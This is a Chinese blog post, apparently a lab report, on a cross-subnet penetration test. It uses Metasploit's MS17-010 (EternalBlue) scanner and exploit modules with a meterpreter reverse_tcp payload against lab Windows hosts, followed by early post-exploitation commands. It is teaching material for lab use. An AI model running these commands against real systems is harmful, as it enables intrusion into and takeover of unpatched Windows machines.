Windows网络服务渗透测试实战-跨网段攻击

本文详细介绍了如何进行Windows跨网段攻击,通过Metasploit利用永恒之蓝漏洞扫描并攻击目标主机,最终获取WinXP系统管理员权限并实现远程关机。
摘要由CSDN通过智能技术生成

一、实验项目名称

Windows网络服务渗透测试实战-跨网段攻击

二、实验目的及要求

掌握对跨网段攻击的方法。

熟悉Metasploit终端的使用方法。

熟悉通过meterpreter进行后渗透操作

获取winxp系统管理员admin的密码,并使xp系统关机

----基础配置----

**1、**选择win7

2、选择winXP

**3、**选择kali

**4、**查看kali的ip

**5、**查看winXP的ip

**6、**查看win7的IP

总结如下:

WinXP

Win7

Kali

网络适配器 桥接模式(自动)

192.168.43.99

网络适配器 桥接模式(自动)

192.168.43.89

网络适配器 NAT

192.168.232.128

网络适配器2 NAT

192.168.232.145

----开始跨网段攻击----

1、输入 msfconsole 启动metasploit

2、使用“永恒之蓝”的漏洞模块,使用扫描命令进行网段内主机扫描

use auxiliary/scanner/smb/smb_ms17_010 //进入扫描模块

set rhosts (目标网段) //扫描目标网段内的主机

set threads 512 //设置扫描线程

run //执行

3、设置攻击步骤进行攻击

use exploit/windows/smb/ms17_010_eternalblue //利用攻击模块

set rhost (目标IP) //设置目标IP

set lhost (监听主机IP) //设置监听IP

set payload windows/x64/meterpreter/reverse_tcp //设置攻击载荷

run

4、通过meterpreter终端获取系统控制台shell,执行ipconfig发现主机存在双网段

5、获取shell权限,在cmd窗口试图下输入 arp -a 可以发现,存在同网段的地址

<
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值